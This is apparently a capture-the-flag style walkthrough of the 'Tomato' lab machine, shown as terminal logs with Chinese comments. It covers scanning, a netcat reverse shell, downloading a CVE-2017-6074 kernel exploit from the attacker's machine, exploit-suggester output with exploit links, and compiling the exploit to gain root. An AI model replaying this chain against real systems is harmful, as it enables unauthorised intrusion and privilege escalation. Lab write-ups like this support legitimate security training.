┌──(root?kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:eb:da:c6, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 00:50:56:c0:00:08 VMware, Inc.
192.168.10.1 00:50:56:ff:c4:ee VMware, Inc. (DUP: 2)
192.168.10.10 00:0c:29:bd:58:5d VMware, Inc.
192.168.10.254 00:50:56:fa:e3:28 VMware, Inc.
┌──(root?kali)-[~]
└─# nmap -p- 192.168.10.10
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-30 08:04 EST
Nmap scan report for 192.168.10.10
Host is up (0.00066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
2211/tcp open emwin
8888/tcp open sun-answerbook
MAC Address: 00:0C:29:BD:58:5D (VMware)
┌──(root?kali)-[~]
└─# nmap -p21,80,2211,8888 -A 192.168.10.10
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-30 08:07 EST
Nmap scan report for 192.168.10.10
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Tomato
|_http-server-header: Apache/2.4.18 (Ubuntu)
2211/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
| 256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
|_ 256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
8888/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Private Property
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 00:0C:29:BD:58:5D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.10.10
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.63 seconds
┌──(root?kali)-[~]
└─# dirsearch -u http://192.168.10.10 -f -e html.php.txt
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: html.php.txt | HTTP method: GET | Threads: 30 | Wordlist size: 13612
Output File: /root/.dirsearch/reports/192.168.10.10/_23-01-30_08-13-44.txt
Error Log: /root/.dirsearch/logs/errors-23-01-30_08-13-44.log
Target: http://192.168.10.10/
[08:13:44] Starting:
[08:13:45] 403 - 278B - /.ht_wsr.txt
[08:13:45] 403 - 278B - /.htaccess.save
[08:13:45] 403 - 278B - /.htaccess_orig
[08:13:45] 403 - 278B - /.htaccess.bak1
[08:13:45] 403 - 278B - /.htaccess.orig
[08:13:45] 403 - 278B - /.htaccess.sample
[08:13:45] 403 - 278B - /.htaccess_extra
[08:13:45] 403 - 278B - /.htaccessOLD2
[08:13:45] 403 - 278B - /.htaccess_sc
[08:13:45] 403 - 278B - /.htm
[08:13:45] 403 - 278B - /.htaccessOLD
[08:13:45] 403 - 278B - /.html
[08:13:45] 403 - 278B - /.htpasswds
[08:13:45] 403 - 278B - /.httr-oauth
[08:13:45] 403 - 278B - /.htpasswd_test
[08:13:45] 403 - 278B - /.php
[08:13:45] 403 - 278B - /.php3
[08:13:45] 403 - 278B - /.htaccessBAK
[08:13:59] 403 - 278B - /icons/
[08:14:00] 200 - 652B - /index.html
[08:14:08] 403 - 278B - /server-status
[08:14:08] 403 - 278B - /server-status/
┌──(root?kali)-[~]
└─# apt install seclists
正在讀取軟件包列表... 完成
正在分析軟件包的依賴關(guān)系樹... 完成
正在讀取狀態(tài)信息... 完成
下列【新】軟件包將被安裝:
seclists
┌──(root?kali)-[~]
└─# dirsearch -u http://192.168.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 4713
Output File: /root/.dirsearch/reports/192.168.10.10/_23-01-30_08-26-17.txt
Error Log: /root/.dirsearch/logs/errors-23-01-30_08-26-17.log
Target: http://192.168.10.10/
[08:26:17] Starting:
[08:26:18] 301 - 322B - /antibot_image -> http://192.168.10.10/antibot_image/
[08:26:20] 200 - 652B - /index.html
[08:26:24] 403 - 278B - /server-status
Task Completed
┌──(root?kali)-[~]
└─# nc -lvnp 3388
listening on [any] 3388 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.10] 57358
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/html/antibot_image/antibots$ uname -a
uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/var/www/html/antibot_image/antibots$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ ls
ls
VMwareDnD
systemd-private-f97ec14089d749fdbbc152039f476db2-systemd-timesyncd.service-gG1VgC
vmware-root
www-data@ubuntu:/tmp$ wget http://192.168.10.100:8000/CVE-2017-6074
wget http://192.168.10.100:8000/CVE-2017-6074
--2023-01-30 07:11:55-- http://192.168.10.100:8000/CVE-2017-6074
Connecting to 192.168.10.100:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23096 (23K) [application/octet-stream]
Saving to: 'CVE-2017-6074'
CVE-2017-6074 100%[===================>] 22.55K --.-KB/s in 0s
2023-01-30 07:11:55 (548 MB/s) - 'CVE-2017-6074' saved [23096/23096]
www-data@ubuntu:/tmp$
www-data@ubuntu:/tmp$ ls -al
ls -al
total 64
drwxrwxrwt 10 root root 4096 Jan 30 07:11 .
drwxr-xr-x 22 root root 4096 Sep 7 2020 ..
drwxrwxrwt 2 root root 4096 Jan 30 04:57 .ICE-unix
drwxrwxrwt 2 root root 4096 Jan 30 04:57 .Test-unix
drwxrwxrwt 2 root root 4096 Jan 30 04:57 .X11-unix
drwxrwxrwt 2 root root 4096 Jan 30 04:57 .XIM-unix
drwxrwxrwt 2 root root 4096 Jan 30 04:57 .font-unix
-rw-r--r-- 1 www-data www-data 23096 Jan 30 06:49 CVE-2017-6074
drwxrwxrwt 2 root root 4096 Jan 30 04:57 VMwareDnD
drwx------ 3 root root 4096 Jan 30 04:57 systemd-private-f97ec14089d749fdbbc152039f476db2-systemd-timesyncd.service-gG1VgC
drwx------ 2 root root 4096 Jan 30 04:57 vmware-root
www-data@ubuntu:/tmp$ chmod +x CVE-2017-6074
www-data@ubuntu:/tmp$ ./CVE-2017-6074
./CVE-2017-6074
./CVE-2017-6074: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./CVE-2017-6074)
www-data@ubuntu:/tmp$ ldd --version
ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
www-data@ubuntu:/tmp$
www-data@ubuntu:/tmp$ strings /lib/x86_64-linux-gnu/libc.so.6 | grep GLIBC_
strings /lib/x86_64-linux-gnu/libc.so.6 | grep GLIBC_
GLIBC_2.2.5
GLIBC_2.2.6
GLIBC_2.3
GLIBC_2.3.2
GLIBC_2.3.3
GLIBC_2.3.4
GLIBC_2.4
GLIBC_2.5
GLIBC_2.6
GLIBC_2.7
GLIBC_2.8
GLIBC_2.9
GLIBC_2.10
GLIBC_2.11
GLIBC_2.12
GLIBC_2.13
GLIBC_2.14
GLIBC_2.15
GLIBC_2.16
GLIBC_2.17
GLIBC_2.18
GLIBC_2.22
GLIBC_2.23
無(wú)法使用make命令情況下使用下面這個(gè)命令
yum -y install gcc automake autoconf libtool make
gcc-7.5.0.tar.gz的安裝一步步安裝這個(gè)教程就行了
https://www.ab62.cn/article/10292.html
www-data@ubuntu:/tmp$ ./linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
73 kernel space exploits
43 user space exploits
Possible Exploits:
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04{kernel:4.4.0-21-generic} ]
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: highly probable
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2016-4557] double-fdput()
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
Exposure: highly probable
Tags: [ ubuntu=16.04{kernel:4.4.0-(21|38|42|98|140)-generic} ]
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2017-7308] af_packet
Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
Exposure: probable
Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: probable
Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2018-1000001] RationalLove
Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
Exposure: less probable
Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Comments: kernel.unprivileged_userns_clone=1 required
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-1000253] PIE_stack_corruption
Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
Exposure: less probable
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
Exposure: less probable
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
[+] [CVE-2016-2384] usb-midi
Details: https://xairy.github.io/blog/2016/cve-2016-2384
Exposure: less probable
Tags: ubuntu=14.04,fedora=22
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
[+] [CVE-2016-0728] keyring
Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
www-data@ubuntu:/tmp$
哭了~~~~
原來(lái)之前運(yùn)行CVE-2017-6074都會(huì)出現(xiàn)version `GLIBC_2.34' not found
www-data@ubuntu:/tmp$ ./CVE-2017-6074
./CVE-2017-6074
./CVE-2017-6074: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./CVE-2017-6074)
試了好多方式祈噪,GLIBC_2.34也安裝了,但是不會(huì)修改軟連接蚤蔓,還把系統(tǒng)搞崩了,今天重新嘗試的時(shí)候發(fā)現(xiàn)了一個(gè)方法翼闹,把.c源文件放到靶機(jī)里面進(jìn)行編譯丁寄,
對(duì)hello.c進(jìn)行預(yù)處理,編譯屈雄,匯編并連接形成可執(zhí)行文件a.out村视,沒(méi)有指定輸出文件,默認(rèn)輸出文件名為a.out
然后終于能執(zhí)行了酒奶,root也拿到了
www-data@ubuntu:/tmp$ gcc CVE-2017-6074.c
gcc CVE-2017-6074.c
www-data@ubuntu:/tmp$ ./a.out
./a.out
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064560(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x402043
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don't kill the exploit binary, the kernel will crash
root@ubuntu:/tmp#
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)